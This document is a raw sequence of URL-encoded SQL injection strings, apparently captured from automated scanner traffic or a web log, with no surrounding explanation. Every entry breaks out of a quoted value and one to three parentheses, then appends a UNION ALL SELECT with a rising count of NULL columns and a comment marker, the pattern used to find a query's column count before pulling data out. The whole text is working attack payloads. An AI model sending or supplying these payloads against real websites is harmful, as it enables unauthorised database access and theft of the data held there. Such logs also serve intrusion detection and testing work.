1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22YgTo%22%3D%22YgTo 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tlYw%22%3D%22tlYw 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22gYba%22%3D%22gYba 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22EhLT%22%3D%22EhLT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22mLWE%22%3D%22mLWE 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22jsKT%22%3D%22jsKT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22GoHp%22%3D%22GoHp 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22tUTU%22%3D%22tUTU 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%22rNhR%22%3D%22rNhR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22lTct%22%3D%22lTct 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22cCHR%22%3D%22cCHR 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22yddo%22%3D%22yddo 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22bBAA%22%3D%22bBAA 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22cHlw%22%3D%22cHlw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22qXdD%22%3D%22qXdD 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22sGaa%22%3D%22sGaa 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22RUTg%22%3D%22RUTg 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22KIeI%22%3D%22KIeI 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%22wNoI%22%3D%22wNoI 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22YFzw%22%3D%22YFzw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22nrox%22%3D%22nrox 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22avnu%22%3D%22avnu 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22PyHC%22%3D%22PyHC 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22iPBF%22%3D%22iPBF 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22vYjT%22%3D%22vYjT 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22tfqo%22%3D%22tfqo 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22HjMw%22%3D%22HjMw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22KmgW%22%3D%22KmgW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%22noNr%22%3D%22noNr 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22GSvQ%22%3D%22GSvQ 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22FRsF%22%3D%22FRsF 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22YvkE%22%3D%22YvkE 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dpNP%22%3D%22dpNP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22dvte%22%3D%22dvte 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22nhpl%22%3D%22nhpl 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%22txYE%22%3D%22txYE 